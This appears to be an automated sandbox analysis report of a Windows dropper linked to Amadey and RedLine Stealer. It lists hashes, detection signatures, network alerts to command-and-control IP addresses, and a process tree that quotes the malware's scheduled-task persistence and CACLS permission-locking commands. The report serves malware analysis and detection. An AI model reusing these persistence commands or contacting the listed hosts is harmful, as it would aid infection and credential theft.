Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 18, 2023, 7:16 a.m.	July 18, 2023, 7:18 a.m.

Size	390.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`327b57745b8c136ea8d4e4e1519f508d`
SHA256	`68f6dd029463140de45d0fc23676acdf0812295e4317fb8ea8fbdb9486b83020`
CRC32	`710AE57B`
ssdeep	`6144:KEy+bnr+Xxp0yN90QEVl+ipoFbeyRRcxX52zflZZcZuneg3rlZS:AMr1y90tjSF+xJ2teg3BY`
PDB Path	wextract.pdb
Yara	UPX_Zero - UPX packed file Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet IsPE32 - (no description)

foto135.exe "C:\Users\test22\AppData\Local\Temp\foto135.exe"
2540
- x8494693.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\x8494693.exe
  2592
  - g9947983.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\g9947983.exe
    2660
    - danke.exe "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe"
      2788
      - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
        2904
      - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
        2960
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        3044
        
        cacls.exe CACLS "danke.exe" /P "test22:N"
        1120
        
        cacls.exe CACLS "danke.exe" /P "test22:R" /E
        1384
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        1264
        
        cacls.exe CACLS "..\3ec1f323b5" /P "test22:N"
        2164
        
        cacls.exe CACLS "..\3ec1f323b5" /P "test22:R" /E
        2244
      - foto135.exe "C:\Users\test22\AppData\Local\Temp\1000030051\foto135.exe"
        2524
        
        x4582761.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\x4582761.exe
        2612
        
        g4433902.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\g4433902.exe
        2804
        
        h6179776.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\h6179776.exe
        2780
        
        j2330856.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\j2330856.exe
        2572
      - fotod25.exe "C:\Users\test22\AppData\Local\Temp\1000031051\fotod25.exe"
        2976
        
        y3722656.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\y3722656.exe
        2052
        
        k2044326.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\k2044326.exe
        2940
        
        l6081493.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\l6081493.exe
        884
        
        n8171002.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\n8171002.exe
        1796
      - an.exe "C:\Users\test22\AppData\Local\Temp\1000032051\an.exe"
        2376
      - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        1364
  - h8269822.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\h8269822.exe
    2836
- j7679413.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\j7679413.exe
  2252
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
77.91.124.31	Active	Moloch
77.91.68.3	Active	Moloch
77.91.68.56	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49186 -> 77.91.124.31:80	2017598	ET MALWARE Possible Kelihos.F EXE Download Common Structure	A Network Trojan was detected
TCP 192.168.56.101:49186 -> 77.91.124.31:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49186 -> 77.91.124.31:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49186	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.124.31:80 -> 192.168.56.101:49186	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49186	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49175 -> 77.91.68.3:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 77.91.68.3:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49175 -> 77.91.68.3:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49185 -> 77.91.68.3:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.68.56:19071 -> 192.168.56.101:49190	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49185 -> 77.91.68.3:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49176 -> 77.91.124.31:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49190 -> 77.91.68.56:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.124.31:80 -> 192.168.56.101:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.124.31:80 -> 192.168.56.101:49176	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49196 -> 77.91.68.3:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49196 -> 77.91.68.3:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 77.91.68.3:80 -> 192.168.56.101:49196	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.68.3:80 -> 192.168.56.101:49196	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.3:80 -> 192.168.56.101:49196	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.101:49191 -> 77.91.68.3:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49176 -> 77.91.124.31:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49176	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 18, 2023, 7:16 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (13 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:16 a.m.			0	0
IsDebuggerPresent July 18, 2023, 7:17 a.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 18, 2023, 7:16 a.m.	buffer: SUCCESS: The scheduled task "danke.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW July 18, 2023, 7:16 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW July 18, 2023, 7:16 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA July 18, 2023, 7:16 a.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (17 events)

Time & API	Arguments	Status	Return
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d91a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d91a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d91a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d91a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d9228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d9228 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d9128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d9128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d9128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d9128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d9128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d91a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d91a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d93a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d9c68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d9c68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 7:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d9b28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 18, 2023, 7:16 a.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (50 out of 686 events)

Time & API	Arguments	Status
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0xa59841 0xa59643 0xa57ad8 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa59978 registers.esp: 4516068 registers.edi: 4516120 registers.eax: 0 registers.ebp: 4516132 registers.edx: 9200256 registers.ebx: 4517572 registers.esi: 46176928 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13b84c9 0x13b832a 0x13b81fd 0x13b6ab3 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514308 registers.edi: 4514608 registers.eax: 0 registers.ebp: 4514620 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 47015004 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13b8a94 0x13b832a 0x13b81fd 0x13b6ab3 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514596 registers.edi: 4514940 registers.eax: 0 registers.ebp: 4514604 registers.edx: 0 registers.ebx: 4517572 registers.esi: 47015004 registers.ecx: 48264588	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13b84c9 0x13b832a 0x13b8215 0x13b6ab3 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514308 registers.edi: 4514608 registers.eax: 0 registers.ebp: 4514620 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 47015004 registers.ecx: 0	1
